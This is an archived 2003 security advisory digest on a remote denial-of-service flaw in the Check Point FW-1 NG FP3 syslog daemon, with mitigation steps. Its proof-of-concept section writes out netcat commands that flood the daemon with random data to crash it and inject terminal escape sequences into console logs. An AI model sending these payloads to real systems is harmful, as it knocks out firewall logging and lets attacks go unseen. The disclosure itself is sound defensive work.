22th Mar 2003 [SBWID-6087]
COMMAND
Check Point DoS attack against syslog daemon
SYSTEMS AFFECTED
Check Point FW-1 NG FP3 & FP3 HF1
PROBLEM
Thanks to Peter of (P) & (C) 2003 AERAsec Network Services and
Security GmbH, advisory :
http://www.aerasec.de/security/advisories/checkpoint-fw1-ng-fp3-syslog-crash.html
http://www.aerasec.de/security/index.html?id=3Dae-200303-064
--snip--
* Successful DoS from remote against syslog daemon of Check Point FW-1
NG FP3 (also FP3 HF1), perhaps remote root exploit possible.
* Syslog message containing escape sequences directed to syslog daemon
of Check Point FW-1 NG FP3 (including HF1 and HF2) remain unfiltered
and cause strange output behaviour if the log is viewed on console.
--snip--
Check Point VPN-1/FW-1 NG FP3 contains a syslog daemon (default: off)
to redirect incoming syslog messages from remote (e.g. routers) to
Check Point's SmartTracker logging mechanism. This syslog daemon can be
crashed from remote and it will not start again auotmatically. Neither
a watchdog service is detecting the crash nor an entry in the SmartView
Tracker about a no longer available syslog daemon appears.
Additionally it will print all chars received in a syslog message from
remote without any modifications. This means, escape sequences are not
filtered or e.g. expanded to their octal values in ASCII.
--snip--
Proof of concept
================
1
=
Start syslog daemon by enabling in the firewall object (and run
cpstop/cpstart afterwards) or by hand executing:
[firewall]# /opt/CPfw1-50-03/bin/syslog 514 all
Shutting down kernel logger: [ OK ]
Shutting down system logger: [ OK ]
Starting system logger: [ OK ]
Starting kernel logger: [ OK ]
Segmentation fault <- caused after receiving random syslog payload,
see below
Check for listening syslog daemon:
[firewall]# netstat -lnptu |grep -w 514
udp 0 0 0.0.0.0:514 0.0.0.0:* $pid/syslog
Note also that this daemon is running as "root":
# ps -ux | grep -w syslog
root $pid 0.0 6.8 148064 8612 ? S 12:17 0:00 syslog 514 all
Send a valid syslog message from a remote host (here also a Linux
system):
[evilhost]# echo "<189>19: 00:01:04: Test" | nc -u firewall 514
Send random payload via syslog message from a remote host:
[evilhost]# cat /dev/urandom | nc -u firewall 514
The previous started syslog daemon should crash after short time, use
"netstat" to see whether a daemon is still listening on UDP port 514
Note: for a clean restart of Check Point's syslog daemon the firewall
service needs to be restarted.
2
=
Enable receiving of syslog from remote by FW-1 like e.g. described
above.
View log on console by running following command:
[firewall]# fw lot -nfnl
Send some special escape sequences via syslog, e.g.
[evilhost]# echo -e "<189>19: 00:01:04:Test\a\033[2J\033[2;5m\033[1;31mHACKER~ATTACK\033[2;25m\033[22;30m\033[3q" | nc -u firewall 514
Take a look at the console again, but don't be scared too much for
now... Press CTRL-C and reset the console to standard by executing:
[firewall]# reset
Attackers might send a lot of "special" escape sequences, for Linux as
destination see "man console_codes" for more.
Note: standard syslog daemon on a RHL 7.3 system treats code like this
as shown here:
Mar 14 13:29:30 linuxbox 19: 00:01:04: Test^G^[[2J^[[2;5m^[[1;31mHACKER ATTACK ^[[2;25m^[[22;30m^[[3q
SOLUTION
Solutions to prevent the successful DoS attack against syslog service:
- Upgrade to FP3 HF2 as soon as possible, see for more information
(available since 14 March 2003) :
http://www.checkpoint.com/techsupport/ng/fp3_hotfix.html
- Customize your ruleset and accept syslog messages only from dedicated
(and trusted, see below) senders by the enforcement module
Solutions to prevent unfiltered console output:
- Filter log output by using "tr" like:
[firewall]# fw log -tfnl | tr '\000-\011\013-\037\200-\377' '*'
(all chars with ASCII codes from from decimal 0-31 and 128-255 except
10 for LF are replaced by a '*')
- Update Check Point's syslog daemon to newer version once again, when
available :
http://www.checkpoint.com/techsupport/alerts/syslog.html
- Improve ruleset like suggested above.